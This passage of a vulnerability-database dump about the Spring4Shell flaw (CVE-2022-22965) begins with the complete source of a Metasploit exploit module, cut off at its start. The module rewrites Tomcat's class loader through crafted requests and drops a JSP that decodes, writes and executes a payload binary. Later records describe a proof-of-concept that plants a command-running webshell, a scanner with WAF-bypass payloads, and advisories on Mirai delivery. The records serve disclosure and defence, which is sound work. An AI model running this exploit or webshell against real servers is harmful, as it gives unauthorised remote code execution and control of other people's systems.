Msf::Exploit::Remote\n\n Rank = ManualRanking # It's going to manipulate the Class Loader\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',\n 'Description' => %q{\n Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above\n and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable\n to remote code execution due to an unsafe data binding used to populate an object from request parameters\n to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the\n org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:\n class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can\n gain remote code execution.\n },\n 'Author' => [\n 'vleminator <vleminator[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-22965'],\n ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],\n ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']\n ],\n 'Platform' => %w[linux win],\n 'Payload' => {\n 'Space' => 5000,\n 'DisableNops' => true\n },\n 'Targets' => [\n [\n 'Java',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w[linux win]\n },\n ],\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux'\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win'\n }\n ]\n ],\n 'DisclosureDate' => '2022-03-31',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Spring4Shell', 'SpringShell'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => 
[REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),\n OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),\n OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def jsp_dropper(file, exe)\n # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.\n dropper = <<~EOS\n <%@ page import=\\\"java.io.FileOutputStream\\\" %>\n <%@ page import=\\\"java.util.Base64\\\" %>\n <%@ page import=\\\"java.io.File\\\" %>\n <%\n FileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false);\n oFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\"));\n oFile.flush();\n oFile.close();\n File f = new File(\\\"#{file}\\\");\n f.setExecutable(true);\n Runtime.getRuntime().exec(\\\"#{file}\\\");\n %>\n EOS\n\n dropper\n end\n\n def modify_class_loader(method, opts)\n cl_prefix = 'class.module.classLoader'\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'version' => '1.1',\n 'method' => method,\n 'headers' => {\n 'c1' => '<%', # %{c1}i replacement in payload\n 'c2' => '%>' # %{c2}i replacement in payload\n },\n \"vars_#{method == 'GET' ? 
'get' : 'post'}\" => {\n \"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format]\n }\n })\n end\n\n def check_log_file\n print_status(\"#{peer} - Waiting for the server to flush the logfile\")\n print_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\")\n\n succeeded = retry_until_true(timeout: 60) do\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(@jsp_file)\n })\n\n res&.code == 200 && !res.body.blank?\n end\n\n fail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded\n\n print_good(\"#{peer} - Log file flushed\")\n end\n\n # Fix the JSP payload to make it valid once it is dropped\n # to the log file\n def fix(jsp)\n output = ''\n jsp.each_line do |l|\n if l =~ /<%.*%>/\n output << l\n elsif l =~ /<%/\n next\n elsif l =~ /%>/\n next\n elsif l.chomp.empty?\n next\n else\n output << \"<% #{l.chomp} %>\"\n end\n end\n output\n end\n\n def create_jsp\n jsp = <<~EOS\n <%\n File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\");\n jsp.delete();\n %>\n #{Faker::Internet.uuid}\n EOS\n if target['Arch'] == ARCH_JAVA\n jsp << fix(payload.encoded)\n else\n payload_exe = generate_payload_exe\n payload_filename = rand_text_alphanumeric(rand(4..7))\n\n if target['Platform'] == 'win'\n payload_path = datastore['WritableDir'] + '\\\\' + payload_filename\n else\n payload_path = datastore['WritableDir'] + '/' + payload_filename\n end\n\n jsp << jsp_dropper(payload_path, payload_exe)\n register_files_for_cleanup(payload_path)\n end\n\n jsp\n end\n\n def check\n @checkcode = 
_check\n end\n\n def _check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))\n )\n\n return CheckCode::Unknown('Web server seems unresponsive') unless res\n\n if res.headers.key?('Server')\n res.headers['Server'].match(%r{(.*)/([\\d|.]+)$})\n else\n res.body.match(%r{Apache\\s(.*)/([\\d|.]+)})\n end\n\n server = Regexp.last_match(1) || nil\n version = Rex::Version.new(Regexp.last_match(2)) || nil\n\n return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)\n\n vprint_status(\"Detected #{server} #{version} running\")\n\n if datastore['HTTP_METHOD'] == 'Automatic'\n # prefer POST over get to keep the vars out of the query string if possible\n methods = %w[POST GET]\n else\n methods = [ datastore['HTTP_METHOD'] ]\n end\n\n methods.each do |method|\n vars = \"vars_#{method == 'GET' ? 'get' : 'post'}\"\n res = send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }\n )\n\n # setting the default assertion status to a valid status\n send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }\n )\n return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n prefix_jsp = rand_text_alphanumeric(rand(3..5))\n date_format = rand_text_numeric(rand(1..4))\n @jsp_file = prefix_jsp + date_format + '.jsp'\n http_method = datastore['HTTP_METHOD']\n if http_method == 'Automatic'\n # if the check was skipped but we need to automatically identify the method, we have to run it here\n @checkcode = check if @checkcode.nil?\n http_method = @checkcode.details[:method]\n fail_with(Failure::BadConfig, 'Failed to automatically identify the 
HTTP method') if http_method.blank?\n\n print_good(\"Automatically identified HTTP method: #{http_method}\")\n end\n\n # if the check method ran automatically, add a short delay before continuing with exploitation\n sleep(5) if @checkcode\n\n # Prepare the JSP\n print_status(\"#{peer} - Generating JSP...\")\n\n # rubocop:disable Style/FormatStringToken\n jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')\n # rubocop:enable Style/FormatStringToken\n\n # Modify the Class Loader\n print_status(\"#{peer} - Modifying Class Loader...\")\n properties = {\n payload: jsp,\n directory: datastore['PAYLOAD_PATH'],\n prefix: prefix_jsp,\n suffix: '.jsp',\n file_date_format: date_format\n }\n res = modify_class_loader(http_method, properties)\n unless res\n fail_with(Failure::TimeoutExpired, \"#{peer} - No answer\")\n end\n\n # No matter what happened, try to 'restore' the Class Loader\n properties = {\n payload: '',\n directory: '',\n prefix: '',\n suffix: '',\n file_date_format: ''\n }\n\n modify_class_loader(http_method, properties)\n\n check_log_file\n\n handler\n end\n\n # Retry the block until it returns a truthy value. Each iteration attempt will\n # be performed with exponential backoff. If the timeout period elapses, false is returned.\n def retry_until_true(timeout:)\n start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)\n ending_time = start_time + timeout\n retry_count = 0\n while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time\n result = yield\n return result if result\n\n retry_count += 1\n remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)\n break if remaining_time_budget <= 0\n\n delay = 2**retry_count\n if delay >= remaining_time_budget\n delay = remaining_time_budget\n vprint_status(\"Final attempt. 
Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}\")\n else\n vprint_status(\"Sleeping for #{delay} seconds before attempting again\")\n end\n\n sleep delay\n end\n\n false\n end\nend\n", "sourceHref": "https://0day.today/exploit/37692", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-05-10T13:38:58", "description": "This is a dockerized application that is vulnerable to the Spring4Shell vulnerability (CVE-2022-22965). Full Java source for the WAR is provided and can be modified; the WAR is rebuilt whenever the docker image is built. The built WAR is then loaded by Tomcat. There is nothing special about this application: it is a simple hello world based on the [Spring tutorials](<https://spring.io/guides/gs/handling-form-submission/> \"Spring tutorials\" ).\n\nDetails: <https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities>\n\nHaving issues with the POC? Check out the LunaSec fork at: <https://github.com/lunasec-io/Spring4Shell-POC>; it is more actively maintained.\n\n## Requirements\n\n 1. Docker\n 2. Python3 + requests library\n\n## Instructions\n\n 1. Clone the repository\n 2. Build and run the container: `docker build . -t spring4shell && docker run -p 8080:8080 spring4shell`\n 3. 
App should now be available at <http://localhost:8080/helloworld/greeting>\n\n 4. Run the exploit.py script: `python exploit.py --url \"http://localhost:8080/helloworld/greeting\"`\n\n 5. Visit the created webshell! Modify the `cmd` GET parameter for your commands. (`http://localhost:8080/shell.jsp` by default)\n\n## Notes\n\n**Fixed!** ~~As of this writing, the container (possibly just Tomcat) must be restarted between exploitations. 
I'm actively trying to resolve this.~~\n\nRe-running the exploit will create an extra artifact file of {old_filename}_.jsp.\n\nPRs/DMs [@Rezn0k](<https://twitter.com/rezn0k> \"@Rezn0k\" ) are welcome for improvements!\n\n## Credits\n\n * [@esheavyind](<https://twitter.com/esheavyind> \"@esheavyind\" ) for help on building a PoC. Check out their writeup at: <https://gist.github.com/esell/c9731a7e2c5404af7716a6810dc33e1a>\n * [@LunaSecIO](<https://twitter.com/LunaSecIO> \"@LunaSecIO\" ) for improving the documentation and exploit\n * [@rwincey](<https://twitter.com/rwincey> \"@rwincey\" ) for making the exploit replayable without requiring a Tomcat restart\n\n**[Download Spring4Shell-POC](<https://github.com/reznok/Spring4Shell-POC> \"Download Spring4Shell-POC\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T12:30:00", "type": "kitploit", "title": "Spring4Shell-POC - Dockerized Spring4Shell (CVE-2022-22965) PoC Application And Exploit", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": 
"2022-05-10T12:30:00", "id": "KITPLOIT:3050371869908791295", "href": "http://www.kitploit.com/2022/05/spring4shell-poc-dockerized.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-24T21:41:15", "description": "#### A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities\n\n# Features\n\n * Support for lists of URLs.\n * Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools use only 1-2 variants).\n * Fuzzing for HTTP GET and POST methods.\n * Automatic validation of the vulnerability upon discovery.\n * Randomized and non-intrusive payloads.\n * WAF Bypass payloads.\n\n# Description\n\nThe Spring4Shell RCE is a critical vulnerability that FullHunt has been researching since it was released. 
We worked with our customers in scanning their environments for Spring4Shell and Spring Cloud RCE vulnerabilities.\n\nWe're open-sourcing an open detection scanning tool for discovering Spring4Shell (CVE-2022-22965) and Spring Cloud RCE (CVE-2022-22963) vulnerabilities. It is intended for security teams to scan their own infrastructure, and to test whether WAF bypasses could allow successful exploitation of the organization's environment.\n\nIf your organization requires help, please contact (team at fullhunt.io) directly for a full attack surface discovery and scanning for the Spring4Shell vulnerabilities.\n\n# Usage\n \n \n $ ./spring4shell-scan.py -h \n [\u2022] CVE-2022-22965 - Spring4Shell RCE Scanner \n [\u2022] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. \n [\u2022] Secure your External Attack Surface with FullHunt.io. 
\n usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL, --url URL Check a single URL. \n -p PROXY, --proxy PROXY \n Send requests through proxy \n -l USEDLIST, --list USEDLIST \n Check a list of URLs. \n --payloads-file PAYLOADS_FILE \n Payloads file - [default: payloads.txt]. \n --waf-bypass Extend scans with WAF bypass payloads. \n --request-type REQUEST_TYPE \n Request Type: (get, post, all) - [Default: all]. \n --test-CVE-2022-22963 \n Test for CVE-2022-22963 (Spring Cloud RCE).\n\n## Scan a Single URL\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local\n\n## Discover WAF bypasses against the environment\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local --waf-bypass\n\n## Scan a list of URLs\n \n \n $ python3 spring4shell-scan.py -l urls.txt\n\n## Include checks for Spring Cloud RCE (CVE-2022-22963)\n \n \n $ python3 spring4shell-scan.py -l urls.txt --test-CVE-2022-22963 \n \n\n# Installation\n \n \n $ pip3 install -r requirements.txt \n \n\n# Docker Support\n \n \n git clone https://github.com/fullhunt/spring4shell-scan.git \n cd spring4shell-scan \n sudo docker build -t spring4shell-scan . \n sudo docker run -it --rm spring4shell-scan \n \n # With URL list \"urls.txt\" in current directory \n docker run -it --rm -v $PWD:/data spring4shell-scan -l /data/urls.txt\n\n# About FullHunt\n\nFullHunt is the next-generation attack surface management (ASM) platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more.\n\nFullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. 
FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges.\n\n# Legal Disclaimer\n\nThis project is made for educational and ethical testing purposes only. Usage of spring4shell-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n# License\n\nThe project is licensed under MIT License.\n\n# Author\n\n_Mazin Ahmed_\n\n * Email: _mazin at FullHunt.io_\n * FullHunt: <https://fullhunt.io>\n * Website: <https://mazinahmed.net>\n * Twitter: <https://twitter.com/mazen160>\n * Linkedin: [http://linkedin.com/in/infosecmazinahmed](<https://linkedin.com/in/infosecmazinahmed> \"http://linkedin.com/in/infosecmazinahmed\" )\n \n \n\n\n**[Download Spring4Shell-Scan](<https://github.com/fullhunt/spring4shell-scan> \"Download Spring4Shell-Scan\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-24T21:30:00", "type": "kitploit", "title": "Spring4Shell-Scan - A Fully Automated, Reliable, And Accurate Scanner For Finding Spring4Shell And Spring Cloud RCE Vulnerabilities", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-24T21:30:00", "id": "KITPLOIT:6278364996548285306", "href": "http://www.kitploit.com/2022/04/spring4shell-scan-fully-automated.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-05-19T18:23:44", "description": "spring-beans is vulnerable to remote code execution. Using Spring Parameter Binding with non-basic parameter types, such as POJOs, allows an unauthenticated attacker to execute arbitrary code on the target system by writing or uploading arbitrary files (e.g .jsp files) to a location that can be loaded by the application server. 
Initial analysis at time of writing shows that exploitation of the vulnerability is only possible with JRE 9 and above, and Apache Tomcat 9 and above, and that the vulnerability requires the usage of Spring parameter binding with non-basic parameter types such as POJOs.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:56:39", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-19T16:55:07", "id": "VERACODE:34883", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34883/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-04-12T15:26:10", "description": "THREAT LEVEL: Red For a detailed advisory, download the pdf file here A zero-day vulnerability has been discovered in the Spring framework, a Java framework that provides infrastructure support for web application development. This vulnerability came to light after a Chinese researcher made a GitHub commit that was quickly erased. 
The vulnerability remained unassigned for over 24 hours before receiving the official identifier CVE-2022-22965. The remote code execution bug affects Spring MVC and Spring WebFlux applications running on JDK 9+. By sending a carefully crafted request to a susceptible server, an attacker could exploit Spring4Shell. The publicly available exploit, however, requires the application to run as a WAR deployment on Tomcat. If the application is deployed as a Spring Boot executable jar, which is the default, it is not vulnerable to that exploit. However, the nature of the vulnerability is broad, and there may be many more ways to exploit it. Active exploitation of Spring4Shell has been observed: attackers are able to weaponize it and execute the Mirai botnet malware on vulnerable servers, specifically in the Singapore region. The Mirai sample is downloaded to the \u201c/tmp\u201d folder and executed after its permissions are changed with \u201cchmod\u201d to make it executable. Organizations using Spring Framework version 5.3.x should upgrade to 5.3.18+, and those on version 5.2.x should upgrade to 5.2.20+. 
Potential MITRE ATT&CK TTPs: TA0042 (Resource Development); T1588 (Obtain Capabilities); T1588.006 (Obtain Capabilities: Vulnerabilities); TA0002 (Execution); T1203 (Exploitation for Client Execution). Patch Links: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement https://tanzu.vmware.com/security/cve-2022-22965 References: https://www.praetorian.com/blog/spring-core-jdk9-rce/ https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/ https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T02:21:11", "type": "hivepro", "title": "RCE Spring Framework Zero-Day vulnerability\u00a0\u201cSpring4Shell\u201d", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-12T02:21:11", "id": "HIVEPRO:41D5BC8D50B4CA10D9CCDA18E6528C27", "href": 
"https://www.hivepro.com/rce-spring-framework-zero-day-vulnerability-spring4shell/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T13:33:01", "description": "For a detailed threat digest, download the pdf file here. Published Vulnerabilities: 438; Interesting Vulnerabilities: 3; Active Threat Groups: 3; Targeted Countries: 53; Targeted Industries: 16; ATT&CK TTPs: 54. The second week of April 2022 witnessed the discovery of 438 vulnerabilities, of which 3 gained the attention of threat actors and security researchers worldwide. All 3 were zero-days and require immediate action. Further, we also observed 3 threat actor groups being highly active in the last week. Armageddon, a well-known Russian threat actor group known for information theft and espionage, was observed targeting European government agencies. Additionally, 2 threat actor groups originating from China were observed targeting organizations all around the world. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. 
Detailed Report: Interesting Vulnerabilities (CVE - Patch Link; * = zero-day vulnerability): CVE-2022-23176* - https://www.watchguard.com/support/release-notes/fireware/12/en-US/EN_ReleaseNotes_Fireware_12_7/index.html; CVE-2021-44228* - https://logging.apache.org/log4j/2.x/manual/migration.html and https://kb.vmware.com/s/article/87073; CVE-2022-22965* - https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement and https://tanzu.vmware.com/security/cve-2022-22965. Active Actors (Name - Origin - Motive): APT 10 (Stone Panda, menuPass, Red Apollo, CVNX, Potassium, Hogfish, Happyyongzi, Cicada, Bronze Riverside, CTG-5938, ATK 41, TA429, ITG01) - China - Information theft and espionage; APT 19 (Deep Panda, Codoso, Sunshop, TG-3551, Bronze Firestone, Pupa) - China - Information theft and espionage; Armageddon (Gamaredon Group, Winterflounder, Primitive Bear, BlueAlpha, Blue Otso, Iron Tilden, SectorC08, Callisto, Shuckworm, Actinium, DEV-0157, UAC-0010) - Russia - Information theft and espionage. Targeted Location: Targeted Sectors: Common TTPs: TA0043: Reconnaissance TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration T1592: Gather Victim Host Information T1583: Acquire Infrastructure T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1574: Hijack Execution Flow T1574: Hijack Execution Flow T1140: Deobfuscate/Decode Files or Information T1056: Input Capture T1087: Account Discovery T1210: Exploitation of Remote Services T1560: Archive Collected Data T1568: Dynamic Resolution T1041: Exfiltration Over C2 Channel T1583.001: Domains T1566: Phishing T1059.001: PowerShell T1574.001: DLL Search Order Hijacking T1574.001: DLL Search Order Hijacking T1564: Hide Artifacts T1056.001: Keylogging T1087.002: Domain Account T1021: Remote Services 
T1560.001: Archive via Utility T1568.001: Fast Flux DNS T1588: Obtain Capabilities T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1574.002: DLL Side-Loading T1574.002: DLL Side-Loading T1574: Hijack Execution Flow T1003: OS Credential Dumping T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1119: Automated Collection T1105: Ingress Tool Transfer T1588.003: Code Signing Certificates T1199: Trusted Relationship T1106: Native API T1053: Scheduled Task/Job T1055: Process Injection T1574.001: DLL Search Order Hijacking T1003.004: LSA Secrets T1046: Network Service Scanning T1021.004: SSH T1005: Data from Local System T1588.002: Tool T1078: Valid Accounts T1053: Scheduled Task/Job T1053.005: Scheduled Task T1055.012: Process Hollowing T1574.002: DLL Side-Loading T1003.003: NTDS T1018: Remote System Discovery T1039: Data from Network Shared Drive T1053.005: Scheduled Task T1078: Valid Accounts T1053: Scheduled Task/Job T1070: Indicator Removal on Host T1003.002: Security Account Manager T1082: System Information Discovery T1074: Local Data Staged T1569: System Services T1053.005: Scheduled Task T1070.003: Clear Command History T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1569.002: Service Execution T1078: Valid Accounts T1070.004: File Deletion T1049: System Network Connections Discovery T1074.002: Remote Data Staging T1204: User Execution T1036: Masquerading T1056: Input Capture T1204.002: Malicious File T1036.005: Match Legitimate Name or Location T1056.001: Keylogging T1047: Windows Management Instrumentation T1036.003: Rename System Utilities T1113: Screen Capture T1027: Obfuscated Files or Information T1027.002: Software Packing T1055: Process Injection T1055.012: Process Hollowing T1620: Reflective Code Loading T1014: Rootkit T1218: Signed Binary Proxy Execution T1218.004: InstallUtil T1553: Subvert Trust Controls T1553.002: Code Signing T1078: Valid Accounts Threat Advisories: Deep Panda 
deploys new rootkit \u201cFire Chili\u201d by exploiting Log4shell in VMware horizon Sandworm Team using a new modular malware Cyclops Blink APT 10, a state-sponsored Chinese threat group, conducting a global cyber espionage operation RCE Spring Framework Zero-Day vulnerability \u201cSpring4Shell\u201d Attacks on European Union and Ukrainian government entities carried out by the Armageddon group", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-13T06:34:35", "type": "hivepro", "title": "Weekly Threat Digest: 4 \u2013 10 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22965", "CVE-2022-23176"], "modified": "2022-04-13T06:34:35", "id": "HIVEPRO:C037186E3B2166871D34825A7A6719EE", "href": "https://www.hivepro.com/weekly-threat-digest-4-10-april-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-06T06:06:11", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 500 7 3 
